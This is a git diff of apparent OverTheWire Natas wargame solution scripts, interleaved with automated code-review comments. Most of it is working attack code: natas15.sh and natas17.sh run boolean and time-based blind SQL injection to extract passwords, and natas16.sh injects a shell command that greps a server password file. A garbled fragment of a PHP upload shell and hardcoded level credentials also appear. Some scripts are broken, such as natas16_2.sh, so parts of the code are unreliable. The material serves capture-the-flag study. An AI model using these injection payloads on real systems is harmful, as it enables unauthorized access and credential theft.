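Review bot: `extract_key` is annotated `tuple[bytes, int] | None`, but the `None` branch is unreachable: on the final iteration `substr` equals `k` itself, so the `if k == substr*(Lk//length) + substr[:Lk%length]` test always succeeds and the unguarded unpack `key, key_size = extract_key(decoded)` in `main` can never see `None`. Either drop `| None` from the annotation, or reject the trivial period (`length == Lk`) and have `main` handle `None` explicitly — which would also give `key_size`, currently assigned and never read, a purpose. `print('Forged:', forged_cookie)` prints a `bytes` repr (`b'...'`); `forged_cookie.decode()` prints the cookie value itself. A module docstring stating the assumption the script rests on (the cookie is the JSON plaintext XORed with a short repeating key, which a single known plaintext recovers) would orient a reader, and the corresponding server-side fix is an authenticated cookie (an HMAC over the value), which is what makes this kind of forgery detectable.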
diff --git a/overthewire/natas/scripts/natas12.php b/overthewire/natas/scripts/natas12.php
new file mode 100644
index 0000000..8ac4115
--- /dev/null
+++ b/overthewire/natas/scripts/natas12.php
@@ -0,0 +1,16 @@
+
+
+
+ + +
+
+&1');
+    }
+?>
+
+ +
diff --git a/overthewire/natas/scripts/natas13.php b/overthewire/natas/scripts/natas13.php
new file mode 100644
index 0000000..b5cdafc
Binary files /dev/null and b/overthewire/natas/scripts/natas13.php differ
diff --git a/overthewire/natas/scripts/natas15.sh b/overthewire/natas/scripts/natas15.sh
new file mode 100755
index 0000000..19546d3
--- /dev/null
+++ b/overthewire/natas/scripts/natas15.sh
@@ -0,0 +1,90 @@ +#!/usr/bin/env bash + +req() { + curl http://natas15.natas.labs.overthewire.org/index.php \ + -X POST \ + -u natas15:SdqIqBsFcz3yotlNYErZSZwblkm0lrvx \ + -d "username=natas16\" and $1 -- " \ + -sS \ + | grep exists &>/dev/null +} + +# ie `guess_length "=32"` or `guess_length ">32"` +guess_length() { + req "length(password)$1" +} + +get_length() { + echo "[*] Guessing length" + local MIN=${1:-1} + local MAX=${2:-100} + # local PADMAX=${#MAX} + local FGUESS="%${#MAX}s - %-${#MAX}s" + while true; do + printf "[-] Guess: $FGUESS\r" $MIN $MAX + if [ $((MAX-MIN)) -eq 1 ]; then + break + fi; + + local MID=$(( (MAX+MIN)/2 )) + guess_length ">$MID" && MIN=$MID || MAX=$MID + done + printf "[+] Found: $FGUESS\n" $MIN $MAX + return $MAX +} + +LOWER="abcdefghijklmnopqrstuvwxyz" +UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ" +DIGIT="0123456789" + +guess_regex() { + req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')" +} + +exploit_oracle() { + echo "[@] Forcing oracle exploit" + local PREFIX="" + local LENGTH=$1 + + while true; do + if [ "${#PREFIX}" = "$LENGTH" ]; then + break + fi + + for chars in $LOWER $UPPER $DIGIT; do + local MIN=1 + local MAX=${#chars} + + local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]" + echo -en "[*] ?? $RANGE\r" + guess_regex "$PREFIX$RANGE$POSTFIX" || continue + echo "[+] Found[CHARSET]: $chars" + + local MID=$(( (MAX+MIN)/2 )) + while true; do + echo -en "[*] Guess: $RANGE\r" + if [ $((MAX-MIN)) -eq 1 ]; then + if guess_regex "$PREFIX${chars:MIN-1:1}"; then + PREFIX="${PREFIX}${chars:MIN-1:1}" + else + PREFIX="${PREFIX}${chars:MAX-1:1}" + fi + echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX" + break + fi; + + MID=$(( (MAX+MIN)/2 )) + RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]" + guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID + done + break + done + done + printf "[+] Found: $FGUESS\n" $MIN $MAX +} + + +get_length +LENGTH=$? + +exploit_oracle "$LENGTH" 
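Review bot: In `exploit_oracle` the closing `printf "[+] Found: $FGUESS\n" $MIN $MAX` uses `FGUESS`, which is declared `local` inside `get_length`, so at that point it is empty and the line prints `[+] Found: ` with both arguments discarded; the same line appears in natas16_2.sh and natas17.sh. `$POSTFIX` in `guess_regex "$PREFIX$RANGE$POSTFIX"` is never assigned anywhere in the file (nor in those two scripts), so it is always empty and would abort under `set -u`. `req` ends in `| grep exists &>/dev/null`, so a curl transport error is reported to callers as a negative oracle answer and silently steers the binary search in `get_length`; checking `"${PIPESTATUS[0]}"` (or `set -o pipefail`) before returning would keep the two cases apart. `get_length` hands its result back through `return $MAX`, which only works for values below 256 and conflates status with data; printing the value and capturing it with `LENGTH=$(get_length)` is the usual shape.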
diff --git a/overthewire/natas/scripts/natas16.sh b/overthewire/natas/scripts/natas16.sh
new file mode 100755
index 0000000..902409f
--- /dev/null
+++ b/overthewire/natas/scripts/natas16.sh
@@ -0,0 +1,34 @@
+#!/usr/bin/env bash
+
+fcmd() {
+ # echo '$(grep ^$1[a-zA-Z0-9]*$ /etc/natas_webpass/natas17)'
+ echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+ curl http://natas16.natas.labs.overthewire.org/index.php \
+ -X POST \
+ -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+ -d "needle=$1" \
+ -sS \
+ | grep --after-context 2 "
" \
+    | tail -n1 \
+    | grep "African" &>/dev/null
+}
+
+CHARSET="ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789"
+KNOWN=""
+GUESS=""
+for ((i=0 ; i < 32 ; i++)); do
+  for ((j=0; j<${#CHARSET}; j++)); do
+    c=${CHARSET:j:1}
+    GUESS="$KNOWN$c"
+    echo -en "[*] Guess: $GUESS                                  \r"
+    # echo $(fcmd $guess)
+    req "$(fcmd $GUESS)" || break # && KNOWN=$guess # && break
+  done
+  KNOWN=$GUESS
+  echo -en "[+] Known: $KNOWN\n                                    "
+done
+echo
+
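Review bot: The inner `for` over `CHARSET` ends either by `break` on the character the oracle accepted or by exhausting all 62 candidates, and `KNOWN=$GUESS` after the loop cannot tell the two apart: on exhaustion it appends the last candidate (`9`) and the outer loop carries on from a wrong prefix. A found flag (`found=0` before the loop, `found=1` just before the `break`) with an error exit when it is still 0 would make a failed round visible instead of silent. `req` also masks transport failures: a curl error leaves nothing for `grep "African"` to match, which the caller reads as an accepted character, so the same wrong step happens on a dropped connection; `"${PIPESTATUS[0]}"` (or `set -o pipefail`) exposes curl's status. The outer `for ((i=0 ; i < 32 ; i++))` hard-codes the expected length; a comment recording that assumption would help, since `KNOWN` is not otherwise bounded.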
diff --git a/overthewire/natas/scripts/natas16_2.sh b/overthewire/natas/scripts/natas16_2.sh
new file mode 100755
index 0000000..ed52c3d
--- /dev/null
+++ b/overthewire/natas/scripts/natas16_2.sh
@@ -0,0 +1,70 @@
+#!/usr/bin/env bash
+
+fcmd() {
+  echo "\$(grep ^$1.* /etc/natas_webpass/natas17)"
+}
+
+req() {
+  curl http://natas16.natas.labs.overthewire.org/index.php \
+       -X POST \
+       -u natas16:hPkjKYviLQctEW33QmuXL6eDVfMW4sGo \
+       -d "needle=$2" \
+       -sS \
+    | grep --after-context 2 "
"
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  req "regexp_like(password, '^$1[a-zA-Z0-9]*\$', 'c')"
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            PREFIX="${PREFIX}${chars:MIN-1:1}"
+          else
+            PREFIX="${PREFIX}${chars:MAX-1:1}"
+          fi
+          echo -e "[+] Update: ${chars:MAX-1:1} -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+
+get_length
+LENGTH=$?
+
+exploit_oracle "$LENGTH"
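Review bot: `get_length` is called at the bottom of the file but is not defined anywhere in it (it exists only in natas15.sh and natas17.sh), so the call fails with "command not found", `LENGTH=$?` becomes 127, and `exploit_oracle` then runs until it has built a 127-character prefix. `req` reads its needle from `$2` (`-d "needle=$2"`) while `guess_regex` passes a single argument, so the POST body is always `needle=` regardless of the guess, and the `fcmd` helper is defined but never called — together this looks like an unfinished merge of natas16.sh and natas15.sh. Unlike natas15.sh, `req` here does not reduce the response to an exit status, so `guess_regex` returns whatever `grep --after-context 2` returns on the raw page rather than an oracle answer. Either finish the port (`$2` → `$1`, define or source `get_length`, filter the response) or drop the file from the commit.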
diff --git a/overthewire/natas/scripts/natas17.sh b/overthewire/natas/scripts/natas17.sh
new file mode 100755
index 0000000..253ee78
--- /dev/null
+++ b/overthewire/natas/scripts/natas17.sh
@@ -0,0 +1,108 @@
+#!/usr/bin/env bash
+
+USERNAME="natas17"
+PASSWORD="EqjHJbo7LFNb8vwhHb9s75hokh5TF0OC"
+TARGET="natas18"
+
+DELAY=4
+PREFIX="5mxv8BZZVSMzzYPcY95M9m"
+
+req() {
+  CMD=$@
+  curl "http://$USERNAME.natas.labs.overthewire.org/index.php" \
+       -X POST \
+       -u "$USERNAME:$PASSWORD" \
+       -d "username=natas18\" AND $CMD AND SLEEP($DELAY) # " \
+       -sS &>/dev/null
+}
+
+time_req() (
+  export STAT
+  export CMD="$@"
+  (time (req $CMD; STAT=$?)) \
+    |& grep real \
+    |  awk '{print substr($2, 3, 1)}'
+  return $STAT
+)
+
+# ie `guess_length "=32"` or `guess_length ">32"`
+guess_length() {
+  ELAPSED=$(time_req "LENGTH(password)$1")
+  return $(( ELAPSED < DELAY ))
+}
+
+get_length() {
+  echo "[*] Guessing length"
+  local MIN=${1:-1}
+  local MAX=${2:-100}
+  # local PADMAX=${#MAX}
+  local FGUESS="%${#MAX}s-%-${#MAX}s"
+  while true; do
+    printf "[-] Guess: $FGUESS\r" $MIN $MAX
+    if [ $((MAX-MIN)) -eq 1 ]; then
+      break
+    fi;
+    
+    local MID=$(( (MAX+MIN)/2 ))
+    guess_length ">$MID" && MIN=$MID || MAX=$MID
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+  return $MAX
+}
+
+LOWER="abcdefghijklmnopqrstuvwxyz"
+UPPER="ABCDEFGHIJKLMNOPQRSTUVWXYZ"
+DIGIT="0123456789"
+
+guess_regex() {
+  ELAPSED=$(time_req "REGEXP_LIKE(password, '^$1[a-zA-Z0-9]*\$', 'c')")
+  return $(( ELAPSED < DELAY ))
+}
+
+exploit_oracle() {
+  echo "[@] Forcing oracle exploit"
+  local PREFIX=""
+  local LENGTH=$1
+
+  while true; do
+    if [ "${#PREFIX}" = "$LENGTH" ]; then
+      break
+    fi
+    
+    for chars in $LOWER $UPPER $DIGIT; do
+      local MIN=1
+      local MAX=${#chars}
+    
+      local RANGE="[${chars:MIN-1:1}-${chars:MAX-1:1}]"
+      echo -en "[*] ?? $RANGE\r"
+      guess_regex "$PREFIX$RANGE$POSTFIX" || continue
+      echo "[+] Found[CHARSET]: $chars"
+
+      local MID=$(( (MAX+MIN)/2 ))
+      while true; do
+        echo -en "[*] Guess: $RANGE\r"
+        if [ $((MAX-MIN)) -eq 1 ]; then
+          local NEWCHAR
+          if guess_regex "$PREFIX${chars:MIN-1:1}"; then
+            NEWCHAR=${chars:MIN-1:1}
+          else
+            NEWCHAR=${chars:MAX-1:1}
+          fi
+          PREFIX="$PREFIX$NEWCHAR"
+          echo -e "[+] Update: $NEWCHAR -> $PREFIX"
+          break
+        fi;
+    
+        MID=$(( (MAX+MIN)/2 ))
+        RANGE="[${chars:MIN-1:1}-${chars:MID-1:1}]"
+        guess_regex "$PREFIX$RANGE" && MAX=$MID || MIN=$MID
+      done
+      break
+    done
+  done
+  printf "[+] Found: $FGUESS\n" $MIN $MAX
+}
+
+get_length
+LENGTH=$?
+exploit_oracle "$LENGTH"
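Review bot: `time_req` measures the response time by parsing a single character of `time`'s output — `awk '{print substr($2, 3, 1)}'` on `real 0m4.123s` yields `4`, but on `0m12.345s` it yields `1` and on `1m02.000s` it yields `0` — so any response slower than 9.9 s (a loaded server) is read as faster than `DELAY` and `guess_length`/`guess_regex` return the wrong answer. Setting `TIMEFORMAT=%R` before `time` prints the elapsed real time as plain seconds, or the elapsed time can be taken from `$SECONDS` around the `req` call; either removes the parsing. `STAT` is assigned inside the `(time (...))` subshell and never reaches `return $STAT`, which therefore returns awk's status; callers only use the captured stdout, so the `export STAT` line is dead. The global `PREFIX="5mxv8BZZVSMzzYPcY95M9m"` is shadowed by `local PREFIX=""` in `exploit_oracle` and never read, so the resume-from-prefix behaviour it suggests does not exist, and `FGUESS` in the last `printf` of `exploit_oracle` is out of scope there (it is local to `get_length`).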
diff --git a/overthewire/order b/overthewire/order
new file mode 100644
index 0000000..39a424a
--- /dev/null
+++ b/overthewire/order
@@ -0,0 +1,2 @@
+bandit - linux essentials
+natas  - web shtuff